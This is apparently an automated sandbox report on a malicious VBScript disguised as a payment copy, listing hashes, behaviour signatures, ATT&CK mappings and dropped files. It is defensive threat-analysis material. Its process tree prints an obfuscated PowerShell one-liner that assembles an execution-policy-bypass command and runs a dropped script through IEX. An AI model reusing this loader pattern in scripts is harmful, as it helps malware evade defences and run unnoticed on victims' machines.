8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72

General

Target

N2K18_Payment_Copy.vbs
Size

2KB
MD5

76d64bdec97716fc5db19bf4d9fd3255
SHA1

35f62e6cc17c8bc982db07c556216d98fd600c02
SHA256

8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72
SHA512

d38a1e31a96267bb7706b4e072c6c383bb26eb2e065b0b6e5b6c178ac87cc0115d2a2f88ec5ab71a93364197e1eefff0e3c3cb87a50b636607e2026b962c90f9

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

668 powershell.exe
1376 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 668 powershell.exe
Token: SeDebugPrivilege 1376 powershell.exe

pid	process
668	powershell.exe
1376	powershell.exe

description	pid	process
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1488 wrote to memory of 668	1488	WScript.exe	powershell.exe
PID 1488 wrote to memory of 668	1488	WScript.exe	powershell.exe
PID 1488 wrote to memory of 668	1488	WScript.exe	powershell.exe
PID 668 wrote to memory of 1376	668	powershell.exe	powershell.exe
PID 668 wrote to memory of 1376	668	powershell.exe	powershell.exe
PID 668 wrote to memory of 1376	668	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\N2K18_Payment_Copy.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
1fd45d815452f47e076746f28f57484f

SHA1
37aaf36a782292814b46ac3d61603372c9c17bdd

SHA256
5cb3c993e228cc99f6d637c3e4d5c511dbb2df18d1a1d400535749fd9db8032a

SHA512
cd04f1e62110ce532b5028f25c1d349870fe4e2842d969069e95022f436e3a3db597083ab58993043a5ad120f53373a5c882e6270d745eb0fd4409a135f6bbe1

Download Submit
C:\Users\Public\Downloads\HBar.ps1
MD5
b1da375f7fc47b6e7f441a44b1925371

SHA1
336132bf0096ad8fa877cf25978e9bb2b911554e

SHA256
51b7e07f22110272589c03f523256f454274605cc41ed5847448b9c0bf62e4bd

SHA512
d9861c341b1ae91647d51053b93291ca5862de418a5a42ac56c765e19abb7cf9f5c29bc6e72c1789c3921481f13a0498c1d329dbc68a39c8d8db5b59652f7248

Download Submit
memory/668-64-0x000000000253B000-0x000000000255A000-memory.dmp

Filesize
124KB

Download
memory/668-61-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/668-60-0x0000000002532000-0x0000000002534000-memory.dmp

Filesize
8KB

Download
memory/668-58-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

Filesize
11.4MB

Download
memory/668-56-0x0000000000000000-mapping.dmp

Download
memory/668-59-0x0000000002530000-0x0000000002532000-memory.dmp

Filesize
8KB

Download
memory/1376-66-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

Filesize
11.4MB

Download
memory/1376-67-0x00000000025E0000-0x00000000025E2000-memory.dmp

Filesize
8KB

Download
memory/1376-68-0x00000000025E2000-0x00000000025E4000-memory.dmp

Filesize
8KB

Download
memory/1376-69-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/1376-70-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1376-62-0x0000000000000000-mapping.dmp

Download
memory/1376-72-0x00000000025EB000-0x000000000260A000-memory.dmp

Filesize
124KB

Download
memory/1488-55-0x000007FEFBB91000-0x000007FEFBB93000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing